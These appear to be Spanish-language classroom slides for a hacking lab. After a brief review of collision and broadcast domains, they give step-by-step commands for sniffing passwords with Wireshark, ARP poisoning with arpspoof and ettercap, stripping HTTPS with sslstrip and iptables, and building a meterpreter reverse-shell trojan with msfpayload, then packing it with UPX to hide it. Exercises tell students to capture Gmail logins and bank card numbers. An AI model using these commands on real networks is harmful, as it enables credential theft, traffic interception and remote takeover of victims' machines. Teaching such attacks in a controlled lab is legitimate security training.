Post on 14-Jan-2016
Conceptos Generales
Una colisión en ethernet es el resultado, de dos nodos que transmiten de forma simultanea. Las tramas chocan y se dañan
cuando se encuentran en el medio físico. Un dominio de colisión en ethernet es el área de la red dentro del cual las tramas que ha
sufrido colisiones se propagan.
Un Broadcast es un paquete de datos que se envían a todos los nodos de la red. Los broadcast se identifican a través de una
dirección de broadcast. Dominio de Broadcast es un conjunto de todos los dispositivos que reciben tramas de broadcast que se
originan en cualquier dispositivo del conjunto.
Switching (switch capa 2!)✔Dominio de Colisión✔ Bridge multipuerto
✔Decisiones de envío de datos en base a la dirección MAC destino contenida en cada frame.
Router (switch capa 3!)✔Dominio de Broadcast
✔Crear y mantener una tabla de enrutamiento de cada protocolo de la capa de red.
✔Identificar el protocolo contenido en cada paquete, extraer la dirección destino de la capa de red y enviar los datos en base a la
decisión de enrutamiento.
Sólo una entidad de Capa 3, como un router o una LAN virtual (VLAN), puede detener un
dominio de broadcast de Capa 3. Los routers y las VLAN se utilizan para segmentar los dominios
de colisión y de broadcast.
Wireshark
conseguir pass http (wiresharkhttp): Follow TCP Stream
www.cinemark-peru.com
-> protocolos no seguros!!!!Haganlo Uds! (15 minutos)
Wireshark
conseguir pass ssh? (wiresharkssh): Follow TCP Stream
Wireshark
($ sudo apt-get install wireshark)
Sniffing! :)wget http://192.168.14.100/cb/CSWAE.pdf
Comparar teoria TCP/IP con Wireshark
conseguir pdf (wiresharkpdf): Follow TCP Stream
Haganlo Uds: (15 minutos)
Wireshark
wget http://192.168.14.100/cb/cb.pcap
QUE ES?
envenamiento arp -> arpspoof
arp -asolo dominio de broadcast!!!
$ sudo apt-get install dsniff
Windows:ping x.x.x.x
arp -a
Kali:cat /proc/sys/net/ipv4/ip_forward
echo "1" > /proc/sys/net/ipv4/ip_forward(hacer que el tráfico fluya por nuestro ordenador)
cat /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.14.130 192.168.14.1arpspoof -i eth0 -t 192.168.14.1 192.168.14.130
arp -a en el windows (comparar)
Haganlo Uds! (combinen arpspoof y wireshark para los ejemplos de la primera parte, 30 minutos)
Qué más?
apt-get install driftnetdriftnet -i eth0 -v
wireshark http (png) ->file – export object – http
(ip.src == 192.168.0.3 || ip.dst == 192.168.0.3) && http.request(ip.src == 192.168.0.3 || ip.dst == 192.168.0.3) &&
http.request.method == “POST”
Qué más?
sslstrip
iptables --t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (redirigir todo lo que va por el puerto
80 hacia el 10000, que es donde sslstrip escucha)iptables -t nat -L
sslstrip -l 10000
sslstrip y arpspoof para ver pass https://mail.google.comwireshark -> login
(alumnos: combinen sslstrip y arpspoof para ver número de tarjeta de bcp - 20 minutos)
Qué más?
ettercap –GSniff--->Unified Sniffing
Hosts---> Scan for hostsHost--->Hosts list
Seleccione el Destino 1 (Víctima) y el Destino 2 (router, para poder “sniffear” todo el tráfico entre ellos.
Mitm--->Arp poisoningStart--->Start Sniffing
Qué más?
cain & abelStart sniffer (icono verde arriba a la izquierda)
Tab sniffer – select hostsClick derecho – Scan mac address
Select APRAPR
Add to listStart APR
Qué más?
Spoofing IP (syn flood) -> filtrar ips ingreso fwSpoofing Web (web falsa!) -> educación
Spoofing DNS (dns falso!) -> asegurar server
Virus?
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.14.xx lport=443 X > troyano.exe
Virus?
levantar console con handlemsfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.14.1xx lport=443 E
meterpreter:ifconfigroutepwd
(haganlo uds mismos! 30 minutos)
Virus?
“Instalen” UPX en Kali:http://upx.sourceforge.net/
Virus?
tar -xjvf upx-3...
Virus?
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.14.xx lport=443 X > troyano.exe
./upx -5 troyano.exe -o oculto.exe